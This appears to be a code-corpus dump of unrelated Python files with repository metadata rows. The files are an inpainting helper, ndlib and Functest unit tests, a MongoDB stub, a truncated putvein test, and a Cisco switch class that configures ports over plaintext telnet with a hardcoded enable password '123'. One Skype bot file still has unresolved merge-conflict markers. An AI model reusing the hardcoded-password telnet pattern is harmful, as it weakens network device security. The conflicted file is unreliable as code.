] | 16 | 2015-05-08T11:14:26.000Z | 2021-11-19T19:05:16.000Z | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
] | 3 | 2016-05-12T16:27:14.000Z | 2020-12-27T01:14:24.000Z | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
] | 19 | 2015-03-30T22:34:14.000Z | 2020-11-25T23:29:53.000Z | from parallel_map import parallel_map
| 19 | 37 | 0.894737 | 6 | 38 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a4c45c32603e479cdae302525ea082e452ee8e0 | 160 | py | Python | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | import numpy, cv2
#def maskReformat(mask):
def fromMask(img, mask, radius=50, intype=cv2.INPAINT_NS):
return cv2.inpaint(img, mask, radius, intype)
| 22.857143 | 59 | 0.70625 | 23 | 160 | 4.869565 | 0.608696 | 0.125 | 0.232143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037594 | 0.16875 | 160 | 6 | 60 | 26.666667 | 0.804511 | 0.14375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
e91766496092355f3ebfc850b2c411de1d346d9d | 353 | py | Python | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | 1 | 2016-11-18T11:46:49.000Z | 2016-11-18T11:46:49.000Z | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | null | null | null | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | null | null | null | <<<<<<< HEAD
# -*- coding: utf-8 -*-
import asyncio
import dialog
import skype
def choice(type_m, author, skypeid, isgroup, text):
=======
# -*- coding: utf-8 -*-
import asyncio
import dialog
import skype
def choice(type_m, author, skypeid, isgroup, text):
>>>>>>> origin/master
asyncio.ensure_future(skype.send_text(dialog.get_speech(), skypeid)) | 22.0625 | 72 | 0.688385 | 47 | 353 | 5.06383 | 0.489362 | 0.07563 | 0.084034 | 0.134454 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0 | 0.006515 | 0.130312 | 353 | 16 | 72 | 22.0625 | 0.76873 | 0.121813 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
e93c4468ebce30e3c5934ec450135e3c780868d6 | 6,639 | py | Python | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | 6 | 2018-12-20T07:33:09.000Z | 2020-05-10T07:33:33.000Z | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | 2 | 2020-02-05T09:11:17.000Z | 2020-02-07T11:12:33.000Z | from __future__ import absolute_import
import unittest
import ndlib.parser.ExperimentParser as ep
import networkx as nx
import os
__author__ = 'Giulio Rossetti'
__license__ = "BSD-2-Clause"
__email__ = "giulio.rossetti@gmail.com"
class NdlibParserTest(unittest.TestCase):
def test_node_stochastic(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"COMPOSE c1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c2\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c3\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
def test_ifcompose(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"IF c1 THEN c2 ELSE c3 AS r1\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING r1\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
def test_net_load(self):
base = os.path.dirname(os.path.abspath(__file__))
g = nx.karate_club_graph()
fname = "%s/edge.txt" % base
nx.write_edgelist(g, fname)
query = "LOAD_NETWORK g1 FROM %s\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"COMPOSE c1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c2\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c3\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 10" % fname
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
try:
os.remove("%s/edge.txt" % base)
except OSError:
pass
self.assertIn('trends', iterations[0])
def test_node_countdown(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"STATUS Wait\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE CountDown\n" \
"PARAM iterations 5\n" \
"PARAM name time\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c1\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c2\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
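The backslash-continued query strings above are easy to break when a line is edited; `textwrap.dedent` with a single triple-quoted literal builds the same newline-separated script more readably. A sketch using a shortened script (the DSL keywords are copied from the tests above):

```python
import textwrap

# Same newline-separated DSL script as the backslash-continued strings above,
# built from one triple-quoted literal instead of many "\n" fragments.
query = textwrap.dedent("""\
    CREATE_NETWORK g1
    TYPE erdos_renyi_graph
    PARAM n 300
    PARAM p 0.1

    EXECUTE model1 ON g1 FOR 100""")

print(query.splitlines()[0])  # -> CREATE_NETWORK g1
```

The blank separator lines that the parser expects between blocks survive dedenting, since `dedent` ignores whitespace-only lines when computing the common margin.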
| 31.023364 | 57 | 0.381533 | 607 | 6,639 | 4.092257 | 0.171334 | 0.034622 | 0.020531 | 0.016103 | 0.800725 | 0.799919 | 0.799919 | 0.785427 | 0.785427 | 0.785427 | 0 | 0.030021 | 0.498268 | 6,639 | 213 | 58 | 31.169014 | 0.715701 | 0 | 0 | 0.848485 | 0 | 0 | 0.304112 | 0.003766 | 0 | 0 | 0 | 0 | 0.020202 | 1 | 0.020202 | false | 0.005051 | 0.025253 | 0 | 0.050505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3af5865b411c5a7a9e24401d369b5b4b0551ec61 | 6,006 | py | Python | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | import pexpect
class Cisco3560:
def __init__(self,str_host,str_user,str_passwd):
self.ipaddr=str_host
self.username=str_user
self.passwd=str_passwd
self.administrator = '123'
print('Cisco3560')
def set_speed_duplex_value(self,port,speed,duplex):
# speed: 10, 100, 1000, auto
# duplex: auto, full, half
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('speed %s' % speed)
child.sendline('duplex %s' % duplex)
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('power inline auto')
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('power inline never')
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('no lldp run')
child.sendline('no cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('lldp run')
child.sendline('no cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_cdp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('no lldp run')
child.sendline('cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_cdp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('lldp run')
child.sendline('cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
| 33.553073 | 65 | 0.562105 | 653 | 6,006 | 5.130168 | 0.099541 | 0.26 | 0.106567 | 0.100299 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0 | 0.009727 | 0.298202 | 6,006 | 178 | 66 | 33.741573 | 0.785053 | 0.00716 | 0 | 0.882716 | 0 | 0 | 0.156003 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0.141975 | 0.006173 | 0 | 0.061728 | 0.049383 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
c93c2226c679655457d053220b11d6bf6d4bb4f2 | 196 | py | Python | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | ######################
# Start Learning Here
######################
print("I just updated my first Python program!")
#######################
# End Learning Here
#######################
| 19.6 | 49 | 0.352041 | 14 | 196 | 4.928571 | 0.857143 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153061 | 196 | 9 | 50 | 21.777778 | 0.415663 | 0.188776 | 0 | 0 | 0 | 0 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
a3760445f995105e3fc5387e227bffc9d0221f8c | 10,283 | py | Python | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017 Cable Television Laboratories, Inc. and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
#
# http://www.apache.org/licenses/LICENSE-2.0
# pylint: disable=missing-docstring
import logging
import unittest
import mock
from snaps.openstack.os_credentials import OSCreds
from xtesting.core import testcase
from functest.opnfv_tests.openstack.snaps import api_check
from functest.opnfv_tests.openstack.snaps import health_check
from functest.opnfv_tests.openstack.snaps import smoke
class APICheckTesting(unittest.TestCase):
"""
Ensures the ApiCheck class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.api_check = api_check.ApiCheck(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED,
self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.api_check.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
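The stacked `@mock.patch` decorators in the test methods above feed `*args` in a specific order: decorators apply bottom-up, so `args[0]` is the mock from the decorator closest to the function (here `unittest.TextTestRunner.run`), which is why the tests set `args[0].return_value.testsRun`. A minimal stdlib demonstration of that ordering:

```python
import unittest.mock as mock

@mock.patch("os.getcwd")  # top decorator, applied last   -> args[1]
@mock.patch("os.getpid")  # bottom decorator, applied first -> args[0]
def show_order(*args):
    # Each patch injects its MagicMock as a positional argument.
    return args

mocks = show_order()
```

The mock created by `patch()` is named after the patched attribute, so inspecting `repr(mocks[0])` confirms the bottom decorator arrives first.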
class HealthCheckTesting(unittest.TestCase):
"""
Ensures the HealthCheck class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.health_check = health_check.HealthCheck(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED,
self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
@mock.patch('snaps.openstack.tests.os_source_file_test.'
'OSIntegrationTestCase.parameterize')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.health_check.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.health_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.health_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
mock.ANY, ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, use_keystone=True)
class SmokeTesting(unittest.TestCase):
"""
Ensures the SnapsSmoke class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.smoke = smoke.SnapsSmoke(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_integration_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko_criteria(self, *args):
self.smoke.criteria = 90
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.smoke.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.smoke.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', flavor_metadata=mock.ANY,
image_metadata=mock.ANY, netconf_override=None,
os_creds=self.os_creds, suite=mock.ANY, use_floating_ips=True,
use_keystone=True)
if __name__ == "__main__":
logging.disable(logging.CRITICAL)
unittest.main(verbosity=2)
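The patching idiom these tests lean on — decorating with `mock.patch('unittest.TextTestRunner.run', return_value=mock.MagicMock(...))` and then setting attributes such as `testsRun` on the mock's return value — works because the patched method hands every caller the same `MagicMock`. A minimal standalone sketch (the `FakeJob` class is a hypothetical stand-in, not part of Functest):

```python
import unittest
from unittest import mock


class FakeJob:
    """Hypothetical stand-in for a Functest testcase that drives a runner."""

    def run(self):
        return unittest.TextTestRunner().run(unittest.TestSuite())


with mock.patch('unittest.TextTestRunner.run') as run_mock:
    # Attributes set on return_value appear on whatever run() hands back.
    run_mock.return_value.testsRun = 100
    run_mock.return_value.failures = ['foo']
    result = FakeJob().run()

print(result.testsRun, len(result.failures))  # 100 1
```

Because the mock replaces the unbound method on the class, every runner instance created inside the `with` block returns the configured object, which is exactly what lets the tests above assert on `testsRun`, `failures`, and `errors`.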
# --- app/mongo/client.py (repo: jgphilpott/polyMaker, license: MIT) ---

from pymongo import MongoClient


def mongo_client():
    return MongoClient("database", 27017)
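`MongoClient` keeps its own connection pool and is meant to be created once per process, so a memoized variant of `mongo_client` is a common refinement. A sketch of that caching pattern using only the standard library — the `get_client` name is hypothetical, and a plain tuple stands in for the real client so the snippet runs without a MongoDB server:

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def get_client(host="database", port=27017):
    # The real module would return MongoClient(host, port); a tuple stands
    # in here so the memoization itself can be exercised offline.
    return (host, port)


assert get_client() is get_client()  # every call shares one cached object
```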
# --- bob/db/putvein/test.py (repo: bioidiap/bob.db.putvein, license: BSD-3-Clause) ---

#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
import nose.tools
from .query import Database
def _query_simple_protocol_tests(protocol):
    db = Database()

    objs = db.objects(protocol)
    nose.tools.eq_(len(objs), 1800)  # number of images in the protocol

    objs = db.objects(protocol, kinds='palm')
    nose.tools.eq_(len(objs), 900)  # number of palm images in the protocol
    objs = db.objects(protocol, kinds='wrist')
    nose.tools.eq_(len(objs), 900)  # number of wrist images in the protocol

    objs = db.objects(protocol, groups='train')
    nose.tools.eq_(len(objs), 600)  # number of train images in the protocol
    objs = db.objects(protocol, groups='dev')
    nose.tools.eq_(len(objs), 600)  # number of dev images in the protocol
    objs = db.objects(protocol, groups='eval')
    nose.tools.eq_(len(objs), 600)  # number of eval images in the protocol

    objs = db.objects(protocol, kinds='palm', groups='train')
    nose.tools.eq_(len(objs), 300)  # number of palm train images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='dev')
    nose.tools.eq_(len(objs), 300)  # number of palm dev images in the protocol
    objs = db.objects(protocol, kinds='palm', groups='eval')
